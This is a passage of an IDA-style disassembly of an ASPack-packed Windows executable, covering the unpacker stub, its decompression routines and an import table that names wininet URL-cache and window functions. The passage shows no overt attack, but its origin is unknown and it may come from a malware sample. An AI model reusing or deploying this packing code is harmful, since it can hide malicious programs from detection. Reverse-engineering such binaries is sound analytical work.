0AD66F88Bh, 0F1EBAB66h, 3A72B58Bh, 958B0044h dd 444804h, 468BF203h, 0FC0850Ch, 10A84h, 8BC20300h, 95FF50D8h dd 444918h, 775C085h, 1C95FF53h, 89004449h, 4439B185h dd 0B585C700h, 4439h, 8B000000h, 44480495h, 85068B00h dd 8B0375C0h, 0C2031046h, 39B58503h, 188B0044h, 3107E8Bh dd 0B5BD03FAh, 85004439h, 0A2840FDBh, 0F7000000h, 0C3h dd 3047580h, 534343DAh, 0FFFFE381h, 0FF537FFFh, 4439B1B5h dd 1495FF00h, 85004449h, 6F755BC0h, 0C3F7h, 19758000h dd 0C468B57h, 48048503h, 53500044h, 487F858Dh, 57500044h dd 99E9h, 0FFE38100h, 8B7FFFFFh, 44480885h, 0B1853900h dd 75004439h, 0D38B5724h, 2E2C14Ah, 39B19D8Bh, 7B8B0044h dd 3B7C8B3Ch, 3B5C0378h, 13048B1Ch, 39B18503h, 0EB5F0044h dd 468B5716h, 485030Ch, 50004448h, 0D0858D53h, 50004448h dd 894BEB57h, 0B5858307h, 4004439h, 0FFFF32E9h, 890689FFh dd 46890C46h, 14C68310h, 4804958Bh, 0EBE90044h db 0FEh, 2 dup(0FFh) ; --------------------------------------------------------------------------- loc_4274DB: ; CODE XREF: start+6Ej mov eax, [ebp+443A76h] push eax add eax, [ebp+444804h] pop ecx or ecx, ecx mov [ebp+443EA1h], eax popa jnz short loc_4274FC mov eax, 1 retn 0Ch ; --------------------------------------------------------------------------- loc_4274FC: ; CODE XREF: start+4F1j push offset sub_401219 retn start endp ; --------------------------------------------------------------------------- mov eax, [ebp+444808h] lea ecx, [ebp+444841h] push ecx push eax call dword ptr [ebp+444914h] mov [ebp+4439EDh], eax lea eax, [ebp+444851h] push eax call dword ptr [ebp+44491Ch] mov [ebp+44484Dh], eax lea ecx, [ebp+44485Ch] push ecx push eax call dword ptr [ebp+444914h] mov [ebp+4439F1h], eax mov eax, [ebp+44484Dh] lea ecx, [ebp+444868h] push ecx push eax call dword ptr [ebp+444914h] call eax add esp, 10h pop edi push 30h lea ebx, [ebp+444872h] push ebx push edi push 0 call dword ptr [ebp+4439F1h] push 0FFFFFFFFh call dword ptr [ebp+4439EDh] ; =============== S U B R O U T I N E ======================================= sub_427577 proc near ; CODE XREF: start+1p mov ebp, [esp+0] sub ebp, 4439ABh retn sub_427577 endp ; --------------------------------------------------------------------------- mov eax, [esp+10h] sub esp, 354h lea ecx, [esp+4] push eax call sub_42793D mov ecx, [esp+35Ch] mov edx, [esp+358h] push ecx push edx lea ecx, [esp+0Ch] call sub_4279BB test al, al jnz short loc_4275BC or eax, 0FFFFFFFFh add esp, 354h retn ; --------------------------------------------------------------------------- loc_4275BC: ; CODE XREF: .aspack:004275B0j mov ecx, [esp+360h] lea eax, [esp] push eax push ecx lea ecx, [esp+0Ch] call sub_427BC0 test al, al jnz short loc_4275DF or eax, 0FFFFFFFFh add esp, 354h retn ; --------------------------------------------------------------------------- loc_4275DF: ; CODE XREF: .aspack:004275D3j mov eax, [esp] add esp, 354h retn 10h ; --------------------------------------------------------------------------- align 4 dd 4030201h, 8070605h, 100E0C0Ah, 201C1814h, 40383028h dd 80706050h, 0E0C0A0h, 0 dd 1000000h, 2010101h, 3020202h, 4030303h, 5040404h, 50505h dd 1000000h, 3020201h, 5040403h, 7060605h, 9080807h, 0B0A0A09h dd 0D0C0C0Bh, 0F0E0E0Dh, 1110100Fh, 3 dup(11111111h), 12121211h dd 12121212h db 12h ; =============== S U B R O U T I N E ======================================= sub_42765D proc near ; CODE XREF: sub_427A1C+13p ; sub_427A1C+30p ... var_4 = dword ptr -4 arg_0 = dword ptr 4 push ecx mov edx, ecx push esi mov ecx, 8 push edi cmp [edx+4], ecx jb short loc_4276A1 push ebx mov esi, 0FFFFFFF8h loc_427672: ; CODE XREF: sub_42765D+41j mov eax, [edx] mov bl, [eax] inc eax mov byte ptr [esp+10h+var_4], bl mov [edx], eax mov eax, [edx+8] mov edi, [esp+10h+var_4] shl eax, 8 and edi, 0FFh or eax, edi mov edi, [edx+4] add edi, esi mov [edx+8], eax mov eax, edi mov [edx+4], edi cmp eax, ecx jnb short loc_427672 pop ebx loc_4276A1: ; CODE XREF: sub_42765D+Dj mov esi, [edx+4] mov eax, [edx+8] mov edi, [esp+0Ch+arg_0] sub ecx, esi shr eax, cl mov ecx, 18h sub ecx, edi and eax, 0FFFFFFh shr eax, cl add esi, edi pop edi mov [edx+4], esi pop esi pop ecx retn 4 sub_42765D endp ; =============== S U B R O U T I N E ======================================= sub_4276C8 proc near ; CODE XREF: sub_42793D+3Ep ; sub_42793D+4Cp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_0] mov edx, [esp+arg_4] mov [ecx+84h], eax mov [ecx+88h], edx lea eax, [edx+eax*4] mov [ecx+8Ch], eax add eax, 100h retn 8 sub_4276C8 endp ; =============== S U B R O U T I N E ======================================= sub_4276ED proc near ; CODE XREF: sub_427A1C+4Cp ; sub_427A1C+F7p ... var_98 = dword ptr -98h var_94 = dword ptr -94h var_90 = dword ptr -90h var_8C = dword ptr -8Ch var_88 = dword ptr -88h var_84 = dword ptr -84h var_80 = dword ptr -80h var_7C = dword ptr -7Ch var_40 = dword ptr -40h var_3C = dword ptr -3Ch arg_0 = dword ptr 4 sub esp, 98h push ebx push ebp push esi mov edx, ecx push edi mov ecx, 0Fh mov ebp, [edx+84h] xor eax, eax lea edi, [esp+0A8h+var_7C] xor esi, esi rep stosd mov edi, [esp+0A8h+arg_0] cmp ebp, esi mov [esp+0A8h+var_88], edx jbe short loc_427732 loc_42771D: ; CODE XREF: sub_4276ED+43j xor ecx, ecx mov cl, [eax+edi] mov ebx, [esp+ecx*4+0A8h+var_80] lea ecx, [esp+ecx*4+0A8h+var_80] inc ebx inc eax cmp eax, ebp mov [ecx], ebx jb short loc_42771D loc_427732: ; CODE XREF: sub_4276ED+2Ej mov ecx, 17h mov [esp+0A8h+var_80], esi mov [edx+4], esi mov [edx+44h], esi mov [esp+0A8h+var_40], esi xor edi, edi mov [esp+0A8h+var_8C], esi mov [esp+0A8h+var_98], 1 mov [esp+0A8h+var_90], ecx lea ebp, [edx+8] mov [esp+0A8h+var_94], esi loc_42775E: ; CODE XREF: sub_4276ED+109j mov eax, [esp+esi+0A8h+var_7C] shl eax, cl add edi, eax cmp edi, 1000000h mov [esp+0A8h+var_84], edi ja loc_427804 mov eax, [esp+esi+0A8h+var_80] mov [ebp+0], edi mov ebx, [ebp+3Ch] add eax, ebx cmp ecx, 10h mov [ebp+40h], eax mov [esp+esi+0A8h+var_3C], eax jl short loc_4277DB mov esi, [ebp+0] mov eax, [esp+0A8h+var_98] mov ebx, [esp+0A8h+var_8C] mov edi, [edx+8Ch] shr esi, 10h mov ecx, esi and eax, 0FFh sub ecx, ebx add edi, ebx mov bl, al mov edx, ecx mov bh, bl mov [esp+0A8h+var_8C], esi mov eax, ebx mov esi, [esp+0A8h+var_94] shl eax, 10h mov ax, bx shr ecx, 2 rep stosd mov ecx, edx mov edx, [esp+0A8h+var_88] and ecx, 3 rep stosb mov edi, [esp+0A8h+var_84] mov ecx, [esp+0A8h+var_90] loc_4277DB: ; CODE XREF: sub_4276ED+9Fj mov eax, [esp+0A8h+var_98] add esi, 4 inc eax dec ecx add ebp, 4 cmp ecx, 9 mov [esp+0A8h+var_98], eax mov [esp+0A8h+var_90], ecx mov [esp+0A8h+var_94], esi jge loc_42775E cmp edi, 1000000h jz short loc_427813 loc_427804: ; CODE XREF: sub_4276ED+83j pop edi pop esi pop ebp xor al, al pop ebx add esp, 98h retn 4 ; --------------------------------------------------------------------------- loc_427813: ; CODE XREF: sub_4276ED+115j mov eax, [edx+84h] xor ecx, ecx test eax, eax jbe short loc_42785A mov esi, [esp+0A8h+arg_0] loc_427826: ; CODE XREF: sub_4276ED+16Bj mov al, [ecx+esi] test al, al jz short loc_42784F mov edi, [edx+88h] and eax, 0FFh mov eax, [esp+eax*4+0A8h+var_40] mov [edi+eax*4], ecx xor eax, eax mov al, [ecx+esi] mov edi, [esp+eax*4+0A8h+var_40] lea eax, [esp+eax*4+0A8h+var_40] inc edi mov [eax], edi loc_42784F: ; CODE XREF: sub_4276ED+13Ej mov eax, [edx+84h] inc ecx cmp ecx, eax jb short loc_427826 loc_42785A: ; CODE XREF: sub_4276ED+130j pop edi pop esi pop ebp mov al, 1 pop ebx add esp, 98h retn 4 sub_4276ED endp ; =============== S U B R O U T I N E ======================================= sub_427869 proc near ; CODE XREF: sub_427A1C+64p ; sub_427BC0+28p ... var_4 = dword ptr -4 push ecx push ebx push esi mov esi, ecx push edi mov eax, [esi] cmp dword ptr [eax+4], 8 jb short loc_4278A7 loc_427877: ; CODE XREF: sub_427869+3Cj mov ecx, [eax] mov dl, [ecx] inc ecx mov byte ptr [esp+10h+var_4], dl mov [eax], ecx mov ecx, [eax+8] mov edx, [esp+10h+var_4] shl ecx, 8 and edx, 0FFh or ecx, edx mov edx, [eax+4] add edx, 0FFFFFFF8h mov [eax+8], ecx mov ecx, edx mov [eax+4], edx cmp ecx, 8 jnb short loc_427877 loc_4278A7: ; CODE XREF: sub_427869+Cj mov edx, [eax+4] mov eax, [eax+8] mov ecx, 8 sub ecx, edx shr eax, cl mov ecx, [esi+24h] and eax, 0FFFE00h cmp eax, ecx jnb short loc_4278D6 mov edx, [esi+8Ch] mov ecx, eax shr ecx, 10h xor ebx, ebx mov bl, [ecx+edx] mov edx, ebx jmp short loc_427911 ; --------------------------------------------------------------------------- loc_4278D6: ; CODE XREF: sub_427869+57j cmp eax, [esi+2Ch] jnb short loc_4278E5 cmp eax, [esi+28h] sbb edx, edx add edx, 0Ah jmp short loc_427911 ; --------------------------------------------------------------------------- loc_4278E5: ; CODE XREF: sub_427869+70j cmp eax, [esi+30h] jnb short loc_4278F1 mov edx, 0Bh jmp short loc_427911 ; --------------------------------------------------------------------------- loc_4278F1: ; CODE XREF: sub_427869+7Fj cmp eax, [esi+34h] jnb short loc_4278FD mov edx, 0Ch jmp short loc_427911 ; --------------------------------------------------------------------------- loc_4278FD: ; CODE XREF: sub_427869+8Bj cmp eax, [esi+38h] jnb short loc_427909 mov edx, 0Dh jmp short loc_427911 ; --------------------------------------------------------------------------- loc_427909: ; CODE XREF: sub_427869+97j cmp eax, [esi+3Ch] sbb edx, edx add edx, 0Fh loc_427911: ; CODE XREF: sub_427869+6Bj ; sub_427869+7Aj ... mov ecx, [esi] mov edi, [ecx+4] add edi, edx mov [ecx+4], edi mov ebx, [esi+edx*4] mov ecx, 18h sub eax, ebx sub ecx, edx pop edi shr eax, cl mov ecx, [esi+edx*4+44h] add eax, ecx mov ecx, [esi+88h] pop esi pop ebx mov eax, [ecx+eax*4] pop ecx retn sub_427869 endp ; =============== S U B R O U T I N E ======================================= sub_42793D proc near ; CODE XREF: .aspack:00427590p arg_0 = dword ptr 4 push ebx push esi push edi mov edi, ecx xor edx, edx xor eax, eax lea esi, [edi+268h] loc_42794C: ; CODE XREF: sub_42793D+2Fj mov [esi], edx push esi call sub_427BB2 mov cl, [eax+esi+443FC7h] pop esi mov ebx, 1 add esi, 4 shl ebx, cl add edx, ebx inc eax cmp eax, 3Ah jb short loc_42794C mov eax, [esp+0Ch+arg_0] lea ecx, [edi+10h] push eax push 2D1h call sub_4276C8 push eax push 1Ch lea ecx, [edi+0A0h] call sub_4276C8 push eax push 8 lea ecx, [edi+130h] call sub_4276C8 push eax push 13h lea ecx, [edi+1C0h] call sub_4276C8 mov [edi+260h], eax pop edi pop esi add eax, 2F5h pop ebx retn 4 sub_42793D endp ; =============== S U B R O U T I N E ======================================= sub_4279BB proc near ; CODE XREF: .aspack:004275A9p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_4] mov edx, ecx mov ecx, [esp+arg_0] push edi mov [edx], eax lea eax, [edx+4] mov [eax], ecx mov dword ptr [eax+4], 20h mov [edx+10h], eax mov [edx+0A0h], eax mov [edx+130h], eax mov [edx+1C0h], eax xor eax, eax mov ecx, 0BDh mov [edx+250h], eax mov [edx+254h], eax mov [edx+258h], eax mov edi, [edx+260h] mov [edx+25Ch], eax rep stosd mov ecx, edx stosb call sub_427A1C pop edi retn 8 sub_4279BB endp ; =============== S U B R O U T I N E ======================================= sub_427A1C proc near ; CODE XREF: sub_4279BB+58p ; sub_427BC0+267p var_30C = byte ptr -30Ch var_2F9 = byte ptr -2F9h var_2F8 = byte ptr -2F8h var_27 = byte ptr -27h var_B = byte ptr -0Bh sub esp, 30Ch push ebx mov ebx, ecx push ebp push esi lea ebp, [ebx+4] push edi push 1 mov ecx, ebp call sub_42765D test eax, eax jnz short loc_427A46 mov edi, [ebx+260h] mov ecx, 0BDh rep stosd stosb loc_427A46: ; CODE XREF: sub_427A1C+1Aj xor esi, esi loc_427A48: ; CODE XREF: sub_427A1C+3Dj push 4 mov ecx, ebp call sub_42765D mov [esp+esi+31Ch+var_30C], al inc esi cmp esi, 13h jb short loc_427A48 lea edi, [ebx+1C0h] lea eax, [esp+31Ch+var_30C] push eax mov ecx, edi call sub_4276ED test al, al jnz short loc_427A7C pop edi pop esi pop ebp pop ebx add esp, 30Ch retn ; --------------------------------------------------------------------------- loc_427A7C: ; CODE XREF: sub_427A1C+53j xor esi, esi loc_427A7E: ; CODE XREF: sub_427A1C+E9j mov ecx, edi call sub_427869 cmp eax, 10h jnb short loc_427A9F mov ecx, [ebx+260h] mov dl, [ecx+esi] add dl, al and dl, 0Fh mov [esp+esi+31Ch+var_2F8], dl inc esi jmp short loc_427AFF ; --------------------------------------------------------------------------- loc_427A9F: ; CODE XREF: sub_427A1C+6Cj jnz short loc_427AC9 push 2 mov ecx, ebp call sub_42765D add eax, 3 test eax, eax jle short loc_427AFF loc_427AB1: ; CODE XREF: sub_427A1C+A9j cmp esi, 2F5h jge short loc_427B0B mov cl, [esp+esi+31Ch+var_2F9] dec eax mov [esp+esi+31Ch+var_2F8], cl inc esi test eax, eax jg short loc_427AB1 jmp short loc_427AFF ; --------------------------------------------------------------------------- loc_427AC9: ; CODE XREF: sub_427A1C:loc_427A9Fj cmp eax, 11h jnz short loc_427ADC push 3 mov ecx, ebp call sub_42765D add eax, 3 jmp short loc_427AE8 ; --------------------------------------------------------------------------- loc_427ADC: ; CODE XREF: sub_427A1C+B0j push 7 mov ecx, ebp call sub_42765D add eax, 0Bh loc_427AE8: ; CODE XREF: sub_427A1C+BEj test eax, eax jle short loc_427AFF loc_427AEC: ; CODE XREF: sub_427A1C+E1j cmp esi, 2F5h jge short loc_427B0B mov [esp+esi+31Ch+var_2F8], 0 inc esi dec eax test eax, eax jg short loc_427AEC loc_427AFF: ; CODE XREF: sub_427A1C+81j ; sub_427A1C+93j ... cmp esi, 2F5h jl loc_427A7E loc_427B0B: ; CODE XREF: sub_427A1C+9Bj ; sub_427A1C+D6j lea edx, [esp+31Ch+var_2F8] lea ecx, [ebx+10h] push edx call sub_4276ED test al, al jnz short loc_427B27 pop edi pop esi pop ebp pop ebx add esp, 30Ch retn ; --------------------------------------------------------------------------- loc_427B27: ; CODE XREF: sub_427A1C+FEj lea eax, [esp+31Ch+var_27] lea ecx, [ebx+0A0h] push eax call sub_4276ED test al, al jnz short loc_427B49 pop edi pop esi pop ebp pop ebx add esp, 30Ch retn ; --------------------------------------------------------------------------- loc_427B49: ; CODE XREF: sub_427A1C+120j lea ecx, [esp+31Ch+var_B] push ecx lea ecx, [ebx+130h] call sub_4276ED test al, al jnz short loc_427B6B pop edi pop esi pop ebp pop ebx add esp, 30Ch retn ; --------------------------------------------------------------------------- loc_427B6B: ; CODE XREF: sub_427A1C+142j mov byte ptr [ebx+264h], 0 xor eax, eax loc_427B74: ; CODE XREF: sub_427A1C+166j cmp [esp+eax+31Ch+var_B], 3 jnz short loc_427B86 inc eax cmp eax, 8 jb short loc_427B74 jmp short loc_427B8D ; --------------------------------------------------------------------------- loc_427B86: ; CODE XREF: sub_427A1C+160j mov byte ptr [ebx+264h], 1 loc_427B8D: ; CODE XREF: sub_427A1C+168j mov eax, [ebx+260h] lea ecx, [esp+31Ch+var_2F8] mov esi, 2F5h loc_427B9C: ; CODE XREF: sub_427A1C+187j mov dl, [ecx] mov [eax], dl inc eax inc ecx dec esi jnz short loc_427B9C pop edi pop esi pop ebp mov al, 1 pop ebx add esp, 30Ch retn sub_427A1C endp ; =============== S U B R O U T I N E ======================================= sub_427BB2 proc near ; CODE XREF: sub_42793D+12p ; sub_427BC0+80p ... call sub_427BB8 nop sub_427BB2 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_427BB8 proc near ; CODE XREF: sub_427BB2p pop esi sub esi, 44455Bh retn sub_427BB8 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_427BC0 proc near ; CODE XREF: .aspack:004275CCp var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 4 arg_4 = dword ptr 8 sub esp, 14h mov eax, [esp+14h+arg_4] push ebx push ebp push esi mov dword ptr [eax], 0 mov eax, [esp+20h+arg_0] push edi xor edi, edi test eax, eax mov esi, ecx mov [esp+24h+var_14], edi jbe loc_427E40 loc_427BE5: ; CODE XREF: sub_427BC0+274j lea ecx, [esi+10h] call sub_427869 cmp eax, 100h jnb short loc_427C07 mov ecx, [esi] mov [ecx], al mov ecx, [esi] inc ecx inc edi mov [esi], ecx mov [esp+24h+var_14], edi jmp loc_427E30 ; --------------------------------------------------------------------------- loc_427C07: ; CODE XREF: sub_427BC0+32j cmp eax, 2D0h jnb loc_427E25 add eax, 0FFFFFF00h mov ebp, eax and eax, 7 shr ebp, 3 lea edx, [eax+2] cmp eax, 7 mov [esp+24h+var_10], edx jnz loc_427CC3 lea ecx, [esi+0A0h] call sub_427869 mov ecx, [esi+8] xor ebx, ebx push esi call sub_427BB2 mov bl, [eax+esi+443FABh] pop esi cmp ecx, 8 jb short loc_427C84 loc_427C52: ; CODE XREF: sub_427BC0+C2j mov ecx, [esi+4] mov dl, [ecx] inc ecx mov byte ptr [esp+24h+var_C], dl mov [esi+4], ecx mov ecx, [esi+0Ch] mov edx, [esp+24h+var_C] shl ecx, 8 and edx, 0FFh or ecx, edx mov edx, [esi+8] add edx, 0FFFFFFF8h mov [esi+0Ch], ecx mov ecx, edx mov [esi+8], edx cmp ecx, 8 jnb short loc_427C52 loc_427C84: ; CODE XREF: sub_427BC0+90j mov edi, [esi+8] mov edx, [esi+0Ch] mov ecx, 8 sub ecx, edi add edi, ebx shr edx, cl mov ecx, 18h mov [esi+8], edi sub ecx, ebx and edx, 0FFFFFFh shr edx, cl xor ecx, ecx push esi call sub_427BB2 mov cl, [eax+esi+443F8Fh] pop esi mov eax, [esp+24h+var_10] add ecx, edx add eax, ecx mov [esp+24h+var_10], eax loc_427CC3: ; CODE XREF: sub_427BC0+69j mov al, [esi+264h] mov ebx, [esi+ebp*4+268h] xor edx, edx push esi call sub_427BB2 mov dl, [ebp+esi+443FC7h] pop esi test al, al mov edi, edx jz short loc_427D5C cmp edi, 3 jb short loc_427D5C mov eax, [esi+8] lea ebp, [edi-3] cmp eax, 8 jb short loc_427D27 loc_427CF6: ; CODE XREF: sub_427BC0+165j mov eax, [esi+4] mov edx, [esi+0Ch] shl edx, 8 mov cl, [eax] inc eax mov byte ptr [esp+24h+var_8], cl mov ecx, [esi+8] mov [esi+4], eax mov eax, [esp+24h+var_8] and eax, 0FFh add ecx, 0FFFFFFF8h or edx, eax mov eax, ecx cmp eax, 8 mov [esi+0Ch], edx mov [esi+8], ecx jnb short loc_427CF6 loc_427D27: ; CODE XREF: sub_427BC0+134j mov eax, [esi+8] mov edi, [esi+0Ch] mov ecx, 8 sub ecx, eax add eax, ebp shr edi, cl mov ecx, 18h mov [esi+8], eax sub ecx, ebp and edi, 0FFFFFFh shr edi, cl lea ecx, [esi+130h] call sub_427869 add eax, ebx lea ebx, [eax+edi*8] jmp short loc_427DB7 ; --------------------------------------------------------------------------- loc_427D5C: ; CODE XREF: sub_427BC0+124j ; sub_427BC0+129j cmp dword ptr [esi+8], 8 jb short loc_427D93 loc_427D62: ; CODE XREF: sub_427BC0+1D1j mov eax, [esi+4] mov edx, [esi+0Ch] shl edx, 8 mov cl, [eax] inc eax mov byte ptr [esp+24h+var_4], cl mov ecx, [esi+8] mov [esi+4], eax mov eax, [esp+24h+var_4] and eax, 0FFh add ecx, 0FFFFFFF8h or edx, eax mov eax, ecx cmp eax, 8 mov [esi+0Ch], edx mov [esi+8], ecx jnb short loc_427D62 loc_427D93: ; CODE XREF: sub_427BC0+1A0j mov edx, [esi+8] mov eax, [esi+0Ch] mov ecx, 8 sub ecx, edx add edx, edi shr eax, cl mov ecx, 18h mov [esi+8], edx sub ecx, edi and eax, 0FFFFFFh shr eax, cl add ebx, eax loc_427DB7: ; CODE XREF: sub_427BC0+19Aj cmp ebx, 3 jnb short loc_427DD6 mov ecx, [esi+ebx*4+250h] test ebx, ebx jz short loc_427DF7 mov edx, [esi+250h] mov [esi+ebx*4+250h], edx jmp short loc_427DF1 ; --------------------------------------------------------------------------- loc_427DD6: ; CODE XREF: sub_427BC0+1FAj mov eax, [esi+254h] mov edx, [esi+250h] lea ecx, [ebx-3] mov [esi+258h], eax mov [esi+254h], edx loc_427DF1: ; CODE XREF: sub_427BC0+214j mov [esi+250h], ecx loc_427DF7: ; CODE XREF: sub_427BC0+205j mov eax, [esi] mov edi, [esp+24h+var_10] inc ecx lea edx, [eax+edi] cmp eax, edx mov [esi], edx jnb short loc_427E17 loc_427E07: ; CODE XREF: sub_427BC0+255j mov edx, eax sub edx, ecx inc eax mov dl, [edx] mov [eax-1], dl mov edx, [esi] cmp eax, edx jb short loc_427E07 loc_427E17: ; CODE XREF: sub_427BC0+245j mov eax, [esp+24h+var_14] add eax, edi mov [esp+24h+var_14], eax mov edi, eax jmp short loc_427E30 ; --------------------------------------------------------------------------- loc_427E25: ; CODE XREF: sub_427BC0+4Cj mov ecx, esi call sub_427A1C test al, al jz short loc_427E4C loc_427E30: ; CODE XREF: sub_427BC0+42j ; sub_427BC0+263j cmp edi, [esp+24h+arg_0] jb loc_427BE5 mov eax, [esp+24h+arg_4] mov [eax], edi loc_427E40: ; CODE XREF: sub_427BC0+1Fj pop edi pop esi pop ebp mov al, 1 pop ebx add esp, 14h retn 8 ; --------------------------------------------------------------------------- loc_427E4C: ; CODE XREF: sub_427BC0+26Ej pop edi pop esi pop ebp xor al, al pop ebx add esp, 14h retn 8 sub_427BC0 endp ; --------------------------------------------------------------------------- dd 0 dd 8, 400000h, 7C800000h, 6E72656Bh, 32336C65h, 6C6C642Eh dd 72695600h, 6C617574h, 6F6C6C41h, 69560063h, 61757472h dd 6572466Ch, 69560065h, 61757472h, 6F72506Ch, 74636574h dd 69784500h, 6F725074h, 73736563h, 0 dd 65737500h, 2E323372h, 6C6C64h, 7373654Dh, 42656761h dd 41786Fh, 72707377h, 66746E69h, 4F4C0041h, 52454441h dd 52524520h, 5400524Fh, 70206568h, 65636F72h, 65727564h dd 746E6520h, 70207972h, 746E696Fh, 20732520h, 6C756F63h dd 6F6E2064h, 65622074h, 636F6C20h, 64657461h, 206E6920h dd 20656874h, 616E7964h, 2063696Dh, 6B6E696Ch, 62696C20h dd 79726172h, 732520h, 20656854h, 6964726Fh, 206C616Eh dd 63207525h, 646C756Fh, 746F6E20h, 20656220h, 61636F6Ch dd 20646574h, 74206E69h, 64206568h, 6D616E79h, 6C206369h dd 206B6E69h, 7262696Ch, 20797261h, 90007325h, 7C80ADA0h dd 7C80B6A1h, 7C801D77h, 0 dd 6E72656Bh, 32336C65h, 6C6C642Eh, 47000000h, 72507465h dd 6441636Fh, 73657264h, 73h, 4D746547h, 6C75646Fh, 6E614865h dd 41656C64h, 4C000000h, 4C64616Fh, 61726269h, 417972h dd 3 dup(0) dd 27F80h, 27F70h, 3 dup(0) dd 28074h, 280C4h, 3 dup(0) dd 28081h, 280CCh, 3 dup(0) dd 2808Dh, 280D4h, 3 dup(0) dd 28097h, 280DCh, 3 dup(0) dd 280A2h, 280E4h, 3 dup(0) dd 280ACh, 280ECh, 3 dup(0) dd 280B9h, 280F4h, 5 dup(0) dd 61656C6Fh, 32337475h, 6C6C642Eh, 6E697700h, 74656E69h dd 6C6C642Eh, 656C6F00h, 642E3233h, 75006C6Ch, 33726573h dd 6C642E32h, 6467006Ch, 2E323369h, 6C6C64h, 61766461h dd 32336970h, 6C6C642Eh, 74726300h, 2E6C6C64h, 6C6C64h dd 77124C05h, 0 dd 42C2DE3Dh, 0 ; --------------------------------------------------------------------------- retn ; --------------------------------------------------------------------------- db 0FAh, 4Fh, 77h dd 0 dd 7E43212Bh, 0 dd 77F161D1h, 0 dd 77DD7753h, 0 ; --------------------------------------------------------------------------- jmp short loc_428165 ; --------------------------------------------------------------------------- dw 73D9h dd 0 db 0 align 2 aSysallocstring db 'SysAllocString',0 db 2 dup(0), 46h aIndfirsturlcac db 'indFirstUrlCacheEntryA',0 align 4 dd 436F4300h, 74616572h, 736E4965h, 636E6174h, 65h, 57746547h dd 6F646E69h, 78655477h, 4174h, 74654700h, 636F7453h, 6A624F6Bh dd 746365h, 704F0000h, 72506E65h db 6Fh ; --------------------------------------------------------------------------- loc_428165: ; CODE XREF: .aspack:004280F4j arpl [ebp+73h], sp jnb short near ptr word_4281BE outsd imul esp, [ebp+6Eh], 0 ; --------------------------------------------------------------------------- db 0 dd 74695F00h, 616Fh, 11h dup(0) db 2 dup(0) word_4281BE dw 0 ; CODE XREF: .aspack:00428168j align 1000h _aspack ends ; Section 7. (virtual address 00032000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 00032000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 432000h dd 80h dup(0) align 1000h _idata2 ends end start